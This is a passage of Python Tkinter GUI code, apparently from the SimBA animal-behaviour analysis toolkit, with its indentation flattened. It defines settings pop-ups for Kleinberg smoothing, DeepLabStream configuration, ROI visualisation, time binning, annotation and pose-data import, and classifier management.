kleintoplvl.wm_title('Apply Kleinberg behavior classification smoothing')
#git
label_git_kleinberg = Label(kleintoplvl, text='[Click here to learn about Kleinberg Smoother]',cursor='hand2', fg='blue')
label_git_kleinberg.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/kleinberg_filter.md'))
#kleinberg settings
lbl_kleinberg_settings = LabelFrame(kleintoplvl,text='Kleinberg Settings', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.k_sigma = Entry_Box(lbl_kleinberg_settings,'Sigma','10')
self.k_sigma.entry_set('2')
self.k_gamma = Entry_Box(lbl_kleinberg_settings,'Gamma','10')
self.k_gamma.entry_set('0.3')
self.k_hierarchy = Entry_Box(lbl_kleinberg_settings,'Hierarchy','10')
self.k_hierarchy.entry_set('1')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# get current no of target
notarget = config.getint('SML settings', 'no_targets')
targetlist = [0]*notarget
varlist = [0]*notarget
for i in range(notarget):
varlist[i] = IntVar()
targetlist[i] = (config.get('SML settings', 'target_name_' + str(i + 1)))
#make table for classifier to apply filter
tablelabel = LabelFrame(kleintoplvl,text='Choose classifier(s) to apply Kleinberg smoothing')
for i in range(notarget):
Checkbutton(tablelabel, text=str(targetlist[i]), variable=varlist[i]).grid(row=i, sticky=W)
run_kleinberg_button = Button(kleintoplvl,text='Apply Kleinberg Smoother',command= lambda: self.runkleinberg(targetlist,varlist))
#organize
label_git_kleinberg.grid(row=0,sticky=W)
lbl_kleinberg_settings.grid(row=1,sticky=W,padx=10)
self.k_sigma.grid(row=0,sticky=W)
self.k_gamma.grid(row=1,sticky=W)
self.k_hierarchy.grid(row=2,sticky=W)
tablelabel.grid(row=2,pady=10,padx=10)
run_kleinberg_button.grid(row=3)
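# apply the Kleinberg smoother to the classifiers ticked in the menu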
def runkleinberg(self,targetlist,varlist):
classifier_list =[]
for i in range(len(varlist)):
if varlist[i].get() == 1:
classifier_list.append(targetlist[i])
print(classifier_list,'selected')
run_kleinberg(self.projectconfigini,classifier_list,self.k_sigma.entry_get,self.k_gamma.entry_get,self.k_hierarchy.entry_get)
print('Kleinberg filter applied, process completed.')
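# read the DeepLabStream settings.ini and expose its fields in an editable pop-up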
def DLSsettings(self):
config = ConfigParser()
configFile = os.path.join(str(self.label_settingsini.folder_path),'settings.ini')
config.read(configFile)
# get current settings
#streaming
resolution = config.get('Streaming', 'RESOLUTION')
framerate = config.get('Streaming', 'FRAMERATE')
streams = config.get('Streaming','STREAMS')
outputdir = config.get('Streaming','OUTPUT_DIRECTORY')
multi_devices = config.get('Streaming','MULTIPLE_DEVICES')
video_source = config.get('Streaming','VIDEO_SOURCE')
video_path = config.get('Streaming','VIDEO_PATH')
video = config.get('Streaming','VIDEO')
animal_no = config.get('Streaming','ANIMALS_NUMBER')
port = config.get('Streaming','PORT')
ipwebcam = config.get('Streaming','IPWEBCAM')
#deeplabcut
dlcpath = config.get('DeepLabCut','DLC_PATH')
model = config.get('DeepLabCut','MODEL')
#classification
classifier_path = config.get('Classification','PATH_TO_CLASSIFIER')
allbp = config.get('Classification','ALL_BODYPARTS')
ppm = config.get('Classification','PIXPERMM')
threshold = config.get('Classification','THRESHOLD')
poolsize = config.get('Classification','POOL_SIZE')
#experiment
exp_no = config.get('Experiment','EXP_NUMBER')
record_exp = config.get('Experiment','RECORD_EXP')
#deeplabstream
dls_path = config.get('DeepLabStream','DLS_PATH')
#top level design
dlstoplevel = Toplevel()
dlstoplevel.minsize(300, 400)
dlstoplevel.wm_title('DeepLabStream Settings')
#streaming
labelStreamimg = LabelFrame(dlstoplevel,text='Streaming', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_reso = Entry_Box(labelStreamimg,'Resolution','15')
self.e_fps = Entry_Box(labelStreamimg,'Frame rate','15')
self.e_streams = Entry_Box(labelStreamimg, 'Streams', '15')
self.e_outputdir = FolderSelect(labelStreamimg,'Output directory',title='Select output directory',lblwidth='15')
self.e_multiDevice = Entry_Box(labelStreamimg, 'Multiple devices', '15')
self.e_videosource = Entry_Box(labelStreamimg, 'Video source', '15')
self.e_videopath = FileSelect(labelStreamimg,'Video path',title='Select video',lblwidth='15')
self.e_video = Entry_Box(labelStreamimg, 'Video', '15')
self.e_animalNo = Entry_Box(labelStreamimg, 'Animals #', '15')
self.e_port = Entry_Box(labelStreamimg, 'Port', '15')
self.e_ipwebcam = Entry_Box(labelStreamimg, 'IP webcam', '15')
#deeplabcut
label_dlc = LabelFrame(dlstoplevel,text='DeepLabCut', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_dlcpath = FolderSelect(label_dlc,'DLC path',title='Select deeplabcut package in python site packages',lblwidth='15')
self.e_model = FolderSelect(label_dlc,'Model folder path',title='Select DeepLabCut tracking model folder path',lblwidth='15')
#classification
label_classification = LabelFrame(dlstoplevel,text='Classification', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_classifierpath = FileSelect(label_classification,'Classifier path',title='Select Simba Classifier (.sav) file',lblwidth='15')
self.e_allBP = Entry_Box(label_classification,'All bodyparts',labelwidth='15')
self.e_ppm = Entry_Box(label_classification,'Pixel / mm','15')
self.e_threshold = Entry_Box(label_classification,'Threshold','15')
self.e_poolsize = Entry_Box(label_classification,'Pool size','15')
#experiment
label_exp = LabelFrame(dlstoplevel,text='Experiment', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_expNo = Entry_Box(label_exp,'Experiment #','15')
self.e_recordExp = Entry_Box(label_exp,'Record Experiment','15')
# deeplabstream
label_dls = LabelFrame(dlstoplevel,text='DeepLabStream', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_dls_path = FolderSelect(label_dls,'DLS path',title='Please select DeepLabStream folder in python packages')
#feed in config parser
#streaming
self.e_reso.entPath.insert(0,resolution)
self.e_fps.entPath.insert(0,framerate)
self.e_streams.entPath.insert(0,streams)
self.e_outputdir.folderPath.set(outputdir)
self.e_multiDevice.entPath.insert(0,multi_devices)
self.e_videosource.entPath.insert(0,video_source)
self.e_videopath.filePath.set(video_path)
self.e_video.entPath.insert(0,video)
self.e_animalNo.entPath.insert(0,animal_no)
self.e_port.entPath.insert(0,port)
self.e_ipwebcam.entPath.insert(0,ipwebcam)
#deeplabcut
self.e_dlcpath.folderPath.set(dlcpath)
self.e_model.folderPath.set(model)
#classification
self.e_classifierpath.filePath.set(classifier_path)
self.e_allBP.entPath.insert(0,allbp)
self.e_ppm.entPath.insert(0,ppm)
self.e_threshold.entPath.insert(0,threshold)
self.e_poolsize.entPath.insert(0,poolsize)
#experiment
self.e_expNo.entPath.insert(0,exp_no)
self.e_recordExp.entPath.insert(0,record_exp)
#dls
self.e_dls_path.folderPath.set(dls_path)
#organize
#streaming
labelStreamimg.grid(row=0,sticky=W)
self.e_reso.grid(row=0,sticky=W)
self.e_fps.grid(row=1,sticky=W)
self.e_streams.grid(row=2,sticky=W)
self.e_outputdir.grid(row=3,sticky=W)
self.e_multiDevice.grid(row=4,sticky=W)
self.e_videosource.grid(row=5,sticky=W)
self.e_videopath.grid(row=6,sticky=W)
self.e_video.grid(row=7,sticky=W)
self.e_animalNo.grid(row=8,sticky=W)
self.e_port.grid(row=9,sticky=W)
self.e_ipwebcam.grid(row=10,sticky=W)
#deeplabcut
label_dlc.grid(row=1,sticky=W)
self.e_dlcpath.grid(row=0,sticky=W)
self.e_model.grid(row=1,sticky=W)
#classification
label_classification.grid(row=2,sticky=W)
self.e_classifierpath.grid(row=0,sticky=W)
self.e_allBP.grid(row=1,sticky=W)
self.e_ppm.grid(row=2,sticky=W)
self.e_threshold.grid(row=3,sticky=W)
self.e_poolsize.grid(row=4,sticky=W)
#experiment
label_exp.grid(row=3,sticky=W)
self.e_expNo.grid(row=0,sticky=W)
self.e_recordExp.grid(row=1,sticky=W)
#dls
label_dls.grid(row=4,sticky=W)
self.e_dls_path.grid(row=0,sticky=W)
#confirm button
button = Button(dlstoplevel,text='Save settings',command=self.saveDLSsettings)
button.grid(row=5,pady=10,padx=10)
#run dls
button2 = Button(dlstoplevel,text='Run DeepLabStream',command=lambda: threading.Thread(target=self.rundls).start())
button2.grid(row=6,pady=10,padx=10)
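# launch DeepLabStream by running its app.py with the system Python interpreter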
def rundls(self):
path = str(os.path.join(self.e_dls_path.folder_path,'app.py'))
print(path)
call(['python',path])
def saveDLSsettings(self):
config = ConfigParser()
configFile = os.path.join(str(self.label_settingsini.folder_path),'settings.ini')
config.read(configFile)
# write the new values into ini file
config.set('Streaming', 'RESOLUTION', str(self.e_reso.entry_get))
config.set('Streaming', 'FRAMERATE', str(self.e_fps.entry_get))
config.set('Streaming', 'STREAMS', str(self.e_streams.entry_get))
config.set('Streaming', 'OUTPUT_DIRECTORY', str(self.e_outputdir.folder_path))
config.set('Streaming', 'MULTIPLE_DEVICES', str(self.e_multiDevice.entry_get))
config.set('Streaming', 'VIDEO_SOURCE', str(self.e_videosource.entry_get))
config.set('Streaming', 'VIDEO_PATH', str(self.e_videopath.file_path))
config.set('Streaming', 'VIDEO', str(self.e_video.entry_get))
config.set('Streaming', 'ANIMALS_NUMBER', str(self.e_animalNo.entry_get))
config.set('Streaming', 'PORT', str(self.e_port.entry_get))
config.set('Streaming', 'IPWEBCAM', str(self.e_ipwebcam.entry_get))
config.set('DeepLabCut', 'DLC_PATH', str(self.e_dlcpath.folder_path))
config.set('DeepLabCut', 'MODEL', str(self.e_model.folder_path))
config.set('Classification', 'PATH_TO_CLASSIFIER', str(self.e_classifierpath.file_path))
config.set('Classification', 'ALL_BODYPARTS', str(self.e_allBP.entry_get))
config.set('Classification', 'PIXPERMM', str(self.e_ppm.entry_get))
config.set('Classification', 'THRESHOLD', str(self.e_threshold.entry_get))
config.set('Classification', 'POOL_SIZE', str(self.e_poolsize.entry_get))
config.set('Experiment', 'EXP_NUMBER', str(self.e_expNo.entry_get))
config.set('Experiment', 'RECORD_EXP', str(self.e_recordExp.entry_get))
config.set('DeepLabStream', 'DLS_PATH', str(self.e_dls_path.folder_path))
with open(os.path.join(str(self.label_settingsini.folder_path),'settings.ini'), 'w') as configfile:
config.write(configfile)
print('Settings saved in',os.path.basename(configFile))
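# pop-up for drawing a quick path plot for a selected video and body part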
def quicklineplot(self):
lptoplevel = Toplevel()
lptoplevel.minsize(300,200)
lptoplevel.wm_title('Plot path plot')
videodir = os.path.join(os.path.dirname(self.projectconfigini),'videos')
vid_list = os.listdir(videodir)
bpdir = os.path.join(os.path.dirname(self.projectconfigini),'logs','measures','pose_configs','bp_names','project_bp_names.csv')
bplist = pd.read_csv(bpdir,header=None)[0].to_list()
lplabelframe = LabelFrame(lptoplevel)
videoSelected = DropDownMenu(lplabelframe, 'Video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
bpSelected = DropDownMenu(lplabelframe, 'Body part', bplist, '15')
bpSelected.setChoices(bplist[0])
lpbutton = Button(lplabelframe,text='Generate path plot',command= lambda:draw_line_plot(self.projectconfigini,videoSelected.getChoices(),bpSelected.getChoices()))
#organize
lplabelframe.grid(row=0,sticky=W)
videoSelected.grid(row=1, sticky=W)
bpSelected.grid(row=2, sticky=W)
lpbutton.grid(row=3, pady=12)
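# pop-up for visualizing ROI tracking on a single video or on all videos; the probability threshold is written to the config before plotting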
def visualizeRoiTracking(self):
vrtoplevel = Toplevel()
vrtoplevel.minsize(350, 300)
vrtoplevel.wm_title('Visualize ROI tracking')
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list = os.listdir(videodir)
vrlabelframe = LabelFrame(vrtoplevel,text='Visualize ROI tracking on single video',pady=10,padx=10,font=("Helvetica",12,'bold'),fg='black')
videoSelected = DropDownMenu(vrlabelframe, 'Select video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
vrbutton = Button(vrlabelframe, text='Generate ROI visualization', command=lambda: self.roiPlot_singlevideo(videoSelected.getChoices()))
#multi
multilabelframe = LabelFrame(vrtoplevel,text='Visualize ROI tracking on all videos',pady=10,padx=10,font=("Helvetica",12,'bold'),fg='black')
multiButton = Button(multilabelframe,text='Generate ROI visualization on all videos',command = self.roiPlot_allvideos)
#threshold
self.p_threshold = Entry_Box(vrtoplevel,'Bp probability threshold','20')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# set the probability threshold from the config if it exists
try:
thres = config.get('ROI settings', 'probability_threshold')
self.p_threshold.entry_set(thres)
except:
self.p_threshold.entry_set(0.0)
thresholdlabel = Label(vrtoplevel,text='Note: body-part locations detected with probabilities below this threshold will be filtered out.')
# organize
vrlabelframe.grid(row=0, sticky=W)
videoSelected.grid(row=1, sticky=W)
vrbutton.grid(row=2, pady=12)
multilabelframe.grid(row=1,sticky=W,pady=10)
multiButton.grid(row=0,sticky=W)
self.p_threshold.grid(row=2,sticky=W,pady=10)
thresholdlabel.grid(row=3,sticky=W,pady=10)
def roiPlot_singlevideo(self,video):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
roiPlot(self.projectconfigini,video)
def roiPlot_allvideos(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold',str(self.p_threshold.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
videolist = os.listdir(os.path.join(os.path.dirname(self.projectconfigini),'videos'))
for i in videolist:
roiPlot(self.projectconfigini,i)
def visualizeROifeatures(self):
vrfeattoplevel = Toplevel()
vrfeattoplevel.minsize(350, 300)
vrfeattoplevel.wm_title('Visualize ROI features')
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list = os.listdir(videodir)
vrlabelframe = LabelFrame(vrfeattoplevel, text='Visualize ROI features on single video', pady=10, padx=10,
font=("Helvetica", 12, 'bold'), fg='black')
videoSelected = DropDownMenu(vrlabelframe, 'Select video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
vrbutton = Button(vrlabelframe, text='Generate ROI visualization', command=lambda: self.roifeatures_singlevid(videoSelected.getChoices()))
# multi
multifealabelframe = LabelFrame(vrfeattoplevel, text='Visualize ROI features on all videos', pady=10, padx=10,
font=("Helvetica", 12, 'bold'), fg='black')
multifeaButton = Button(multifealabelframe, text='Generate ROI visualization on all videos',
command=self.roifeatures_allvid)
# threshold
self.p_threshold_b = Entry_Box(vrfeattoplevel, 'Bp probability threshold', '20')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# set the probability threshold from the config if it exists
try:
thres = config.get('ROI settings', 'probability_threshold')
self.p_threshold_b.entry_set(thres)
except:
self.p_threshold_b.entry_set(0.0)
thresholdlabel = Label(vrfeattoplevel,
text='Note: body-part locations detected with probabilities below this threshold will be filtered out.')
# organize
vrlabelframe.grid(row=0, sticky=W)
videoSelected.grid(row=1, sticky=W)
vrbutton.grid(row=2, pady=12)
multifealabelframe.grid(row=1,sticky=W,pady=10)
multifeaButton.grid(row=0,sticky=W)
self.p_threshold_b.grid(row=3,sticky=W,pady=10)
thresholdlabel.grid(row=4,sticky=W,pady=10)
def roifeatures_singlevid(self,video):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_b.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
ROItoFeaturesViz(self.projectconfigini, video)
def roifeatures_allvid(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_b.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
videolist = os.listdir(os.path.join(os.path.dirname(self.projectconfigini),'videos'))
for i in videolist:
ROItoFeaturesViz(self.projectconfigini,i)
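# pop-up asking for a time-bin size; 'mov' runs distance/velocity binning, anything else runs classifier binning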
def timebinmove(self,var):
timebintoplevel = Toplevel()
timebintoplevel.minsize(200, 80)
timebintoplevel.wm_title("Time bins settings")
tb_labelframe = LabelFrame(timebintoplevel)
tb_entry = Entry_Box(tb_labelframe,'Set time bin size (s)','15')
if var == 'mov':
tb_button = Button(tb_labelframe,text='Run',command=lambda:time_bins_movement(self.projectconfigini,int(tb_entry.entry_get)))
else:
tb_button = Button(tb_labelframe, text='Run',
command=lambda: time_bins_classifier(self.projectconfigini, int(tb_entry.entry_get)))
##organize
tb_labelframe.grid(row=0,sticky=W)
tb_entry.grid(row=1,sticky=W)
tb_button.grid(row=2,pady=10)
def importBoris(self):
ann_folder = askdirectory()
append_Boris_annot(self.projectconfigini,ann_folder)
def importSolomon(self):
ann_folder = askdirectory()
solomonToSimba(self.projectconfigini,ann_folder)
def importMARS(self):
ann_folder = askdirectory()
append_dot_ANNOTT(self.projectconfigini, ann_folder)
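# rebuild the pose-data import frame according to the selected file format (CSV, JSON, SLP or multi-animal H5)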
def fileselected(self,val):
try:
self.frame.destroy()
except:
pass
self.frame = Frame(self.label_import_csv)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
no_animals_int = config.getint('General settings', 'animal_no')
try:
self.animal_ID_list = config.get('Multi animal IDs', 'id_list').split(',')
except (NoSectionError, NoOptionError):
self.animal_ID_list = []
for animal in range(no_animals_int): self.animal_ID_list.append('Animal_' + str(animal + 1))
if val == 'CSV (DLC/DeepPoseKit)':
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder selected:', title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',
command=self.importdlctracking_multi, fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv files', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File selected', title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',
command=self.importdlctracking_single, fg='navy')
self.frame.grid(row=1, sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
elif val =='JSON (BENTO)':
# import json into projectfolder
# multijson
label_multijsonimport = LabelFrame(self.frame, text='Import multiple json files', pady=5,
padx=5)
self.folder_json = FolderSelect(label_multijsonimport, 'Folder Select:',
title='Select Folder with .json(s)')
button_import_json = Button(label_multijsonimport, text='Import json to project folder',
command=lambda: json2csv_folder(self.projectconfigini,
self.folder_json.folder_path), fg='navy')
# singlejson
label_singlejsonimport = LabelFrame(self.frame, text='Import single json file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlejsonimport, 'File Select', title='Select a .json file')
button_importsinglejson = Button(label_singlejsonimport, text='Import single .json to project folder',
command=lambda: json2csv_file(self.projectconfigini,
self.file_csv.file_path), fg='navy')
# import json into projectfolder
self.frame.grid(row=1, sticky=W)
label_multijsonimport.grid(row=1, sticky=W)
self.folder_json.grid(row=0, sticky=W)
button_import_json.grid(row=1, sticky=W)
label_singlejsonimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglejson.grid(row=1, sticky=W)
elif val in ('SLP (SLEAP)','H5 (multi-animal DLC)'):
animalsettings = LabelFrame(self.frame, text='Animal settings', pady=5, padx=5)
noofanimals = Entry_Box(animalsettings, 'No of animals', '15')
noofanimals.entry_set(no_animals_int)
animalnamebutton = Button(animalsettings, text='Confirm', command=lambda: self.animalnames(noofanimals.entry_get, animalsettings))
if val == 'H5 (multi-animal DLC)':
options = ['skeleton', 'box','ellipse']
self.dropdowndlc = DropDownMenu(self.frame, 'Tracking type', options, '15')
self.dropdowndlc.setChoices(options[1])
self.h5path = FolderSelect(self.frame, 'Path to h5 files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the \n'
' multi animal DLC tracking data')
runsettings = Button(self.frame, text='Import h5', command=self.importh5)
#organize
self.dropdowndlc.grid(row=2, sticky=W)
else:
self.h5path = FolderSelect(self.frame, 'Path to .slp files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the \n'
' multi animal SLEAP tracking data')
runsettings = Button(self.frame, text='Import .slp', command=self.importh5)
# organize
self.frame.grid(row=1, sticky=W)
animalsettings.grid(row=1, sticky=W)
noofanimals.grid(row=0, sticky=W)
animalnamebutton.grid(row=0, column=1, sticky=W)
#save val into memory for dlc or sleap
self.val = val
self.h5path.grid(row=3, sticky=W)
labelinstruction.grid(row=4, pady=10, sticky=W)
runsettings.grid(row=5, pady=10)
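# import multi-animal DLC (.h5) or SLEAP (.slp) tracking data using the animal names entered in the interface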
def importh5(self):
idlist = []
try:
for i in self.animalnamelist:
idlist.append(i.entry_get)
if self.val =='H5 (multi-animal DLC)':
importMultiDLCpose(self.projectconfigini, self.h5path.folder_path, self.dropdowndlc.getChoices(), idlist)
else:
importSLEAPbottomUP(self.projectconfigini,self.h5path.folder_path,idlist)
except Exception as error_str:
print(error_str)
print('Check that you have confirmed the number of animals and named your animals in the SimBA interface')
def animalnames(self, noofanimal, master):
try:
self.frame2.destroy()
except:
pass
no_animal = int(noofanimal)
self.animalnamelist = [0] * no_animal
self.frame2 = Frame(master)
self.frame2.grid(row=1, sticky=W)
for i in range(no_animal):
self.animalnamelist[i] = Entry_Box(self.frame2, 'Animal ' + str(i + 1) + ' name', '15')
self.animalnamelist[i].grid(row=i, sticky=W)
self.animalnamelist[i].entry_set(self.animal_ID_list[i])
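# append a new classifier target (and an empty model path) to the SML settings in the project config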
def addclassifier(self,newclassifier):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
#get current no of target
notarget = config.getint('SML settings', 'no_targets')
## increase the size of the latest no of target and create a new modelpath and target name
notarget+=1
modelpath = 'model_path_' + str(notarget)
targetname = 'target_name_' + str(notarget)
#write the new values into ini file
config.set('SML settings', modelpath, '')
config.set('SML settings', targetname, str(newclassifier))
config.set('SML settings', 'no_targets', str(notarget))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
print(str(newclassifier),'added.')
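# pop-up to select a classifier to remove from the project config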
def removeclassifiermenu(self):
rcMenu = Toplevel()
rcMenu.minsize(200, 200)
rcMenu.wm_title("Warning: Remove classifier(s) settings")
# get target
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
notarget = config.getint('SML settings', 'no_targets')
targetlist = []
for i in range(notarget):
targetlist.append(config.get('SML settings', 'target_name_' + str(i + 1)))
labelcr = LabelFrame(rcMenu,text='Select a classifier to remove')
classifiertoremove = DropDownMenu(labelcr,'Classifier',targetlist,'8')
classifiertoremove.setChoices(targetlist[0])
button = Button(labelcr,text='Remove classifier',command=lambda:self.removeclassifier(classifiertoremove.getChoices(),targetlist))
#organize
labelcr.grid(row=0,sticky=W)
classifiertoremove.grid(row=0,sticky=W)
button.grid(row=1,pady=10)
def removeclassifier(self,choice,targetlist):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
## try to remove the selected classifier
try:
targetlist.remove(choice)
print(str(choice), 'is removed.')
except ValueError:
print(choice,'no longer exists in the project_config.ini')
config.remove_option('SML settings','no_targets')
for i in range(len(targetlist)+1):
config.remove_option('SML settings','model_path_'+str(i+1))
config.remove_option('SML settings', 'target_name_' + str(i + 1))
config.set('SML settings', 'no_targets', str(len(targetlist)))
for i in range(len(targetlist)):
config.set('SML settings','model_path_'+str(i+1),'')
config.set('SML settings','target_name_'+str(i+1),str(targetlist[i]))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
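# rebuild the path-plot body-part dropdowns to match the selected number of animals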
def tracknoofanimal(self,master,bplist):
try:
self.Bodyparts1.destroy()
except:
pass
try:
self.Bodyparts2.destroy()
except:
pass
if self.noofAnimal.getChoices()=='1':
self.Bodyparts1 = DropDownMenu(master, 'Animal 1 bodypart', bplist, '15')
self.Bodyparts1.setChoices((bplist)[0])
self.Bodyparts1.grid(row=4,sticky=W)
self.Bodyparts2 = DropDownMenu(master, 'Animal 2 bodypart', bplist, '15')
self.Bodyparts2.setChoices(None)
elif self.noofAnimal.getChoices() == '2':
self.Bodyparts1 = DropDownMenu(master, 'Animal 1 bodypart', bplist, '15')
self.Bodyparts1.setChoices((bplist)[0])
self.Bodyparts1.grid(row=4, sticky=W)
self.Bodyparts2 = DropDownMenu(master, 'Animal 2 bodypart', bplist, '15')
self.Bodyparts2.setChoices((bplist)[len(bplist) // 2])
self.Bodyparts2.grid(row=5, sticky=W)
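# open the ROI table if ROI definitions (.h5) exist in /logs/measures, otherwise prompt the user to define shapes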
def loaddefinedroi(self):
h5dir = os.path.join(os.path.dirname(self.projectconfigini), 'logs', 'measures')
h5list = os.listdir(h5dir)
result = [i for i in h5list if '.h5' in i]
if result == []:
print('Please define ROI Shapes')
else:
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
roitableMenu(videodir, self.projectconfigini)
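# pop-up asking for the number of animals before appending ROI data to the feature files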
def appendroisettings(self):
apdroisettings = Toplevel()
apdroisettings.minsize(400, 400)
apdroisettings.wm_title("Append Roi Settings")
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
# first choice frame
firstMenu = LabelFrame(apdroisettings, text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals + 1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu, noOfAnimalVar, *animalOptions)
animalLabel = Label(firstMenu, text="# of animals")
setAnimalButton = Button(firstMenu, text="Confirm",
command=lambda: self.run_roiAnalysisSettings(apdroisettings, noOfAnimalVar,'append'))
# organize
firstMenu.grid(row=0, sticky=W)
animalLabel.grid(row=0, column=0, sticky=W)
animalMenu.grid(row=0, column=1, sticky=W)
setAnimalButton.grid(row=0, column=2, sticky=W)
def timebin_ml(self,title,text='Run'):
roisettings = Toplevel()
roisettings.minsize(400, 400)
roisettings.wm_title(title)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
#first choice frame
firstMenu = LabelFrame(roisettings,text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals+1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu,noOfAnimalVar,*animalOptions)
animalLabel = Label(firstMenu,text="# of animals")
setAnimalButton = Button(firstMenu,text="Confirm",command=lambda:self.timebin_ml2(roisettings,noOfAnimalVar,text=text))
#organize
firstMenu.grid(row=0,sticky=W)
animalLabel.grid(row=0,column=0,sticky=W)
animalMenu.grid(row=0,column=1,sticky=W)
setAnimalButton.grid(row=0,column=2,sticky=W)
def timebin_ml2(self, master, noofanimal, text='Run'):
try:
self.secondMenu.destroy()
except:
pass
self.secondMenu = LabelFrame(master, text="Choose bodyparts")
# try to see if it exist or not
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
runButton = Button(self.secondMenu, text=text,
command=lambda: self.timebin_ml3(noofanimal.get(),self.animalVarList[animal].get(),self.binlen.entry_get))
animals2analyze = noofanimal.get()
labelFrameList, labelList, self.animalVarList, AnimalStringVarList, optionsVarList, animalBodyMenuList = [], [], [], [], [], []
options = define_bp_drop_down(configini)
for animal in range(animals2analyze):
animalName = str(animal + 1)
labelFrameList.append(LabelFrame(self.secondMenu, text='Animal ' + animalName))
labelList.append(Label(labelFrameList[animal], text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[animal].set(options[animal][0])
animalBodyMenuList.append(OptionMenu(labelFrameList[animal], self.animalVarList[animal], *options[animal]))
#binlen
self.binlen = Entry_Box(self.secondMenu,'Set time bin size (s)',"16")
# organize
self.secondMenu.grid(row=1, sticky=W)
for animal in range(animals2analyze):
labelFrameList[animal].grid(row=animal, column=0, sticky=W)
labelList[animal].grid(row=0, column=0, sticky=W)
animalBodyMenuList[animal].grid(row=animal, column=0, sticky=W)
self.binlen.grid(row=animals2analyze+2,sticky=W)
runButton.grid(row=animals2analyze + 3, padx=10, pady=10)
def timebin_ml3(self,noofanimal,animalBp,binlen):
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
config.set('process movements', 'no_of_animals', str(noofanimal))
bp_vars_dist = self.animalVarList
for animal in range(noofanimal):
animalBp = str(bp_vars_dist[animal].get())
config.set('process movements', 'animal_' + str(animal+1) + '_bp', animalBp)
with open(configini, 'w') as configfile:
config.write(configfile)
time_bins_movement(configini,int(binlen))
def roi_settings(self,title,selection,text='Run'):
roisettings = Toplevel()
roisettings.minsize(400, 400)
roisettings.wm_title(title)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
#first choice frame
firstMenu = LabelFrame(roisettings,text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals+1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu,noOfAnimalVar,*animalOptions)
animalLabel = Label(firstMenu,text="# of animals")
setAnimalButton = Button(firstMenu,text="Confirm",command=lambda:self.run_roiAnalysisSettings(roisettings,noOfAnimalVar,selection,text=text))
#organize
firstMenu.grid(row=0,sticky=W)
animalLabel.grid(row=0,column=0,sticky=W)
animalMenu.grid(row=0,column=1,sticky=W)
setAnimalButton.grid(row=0,column=2,sticky=W)
def run_roiAnalysisSettings(self,master,noofanimal,appendornot,text='Run'):
try:
self.secondMenu.destroy()
except:
pass
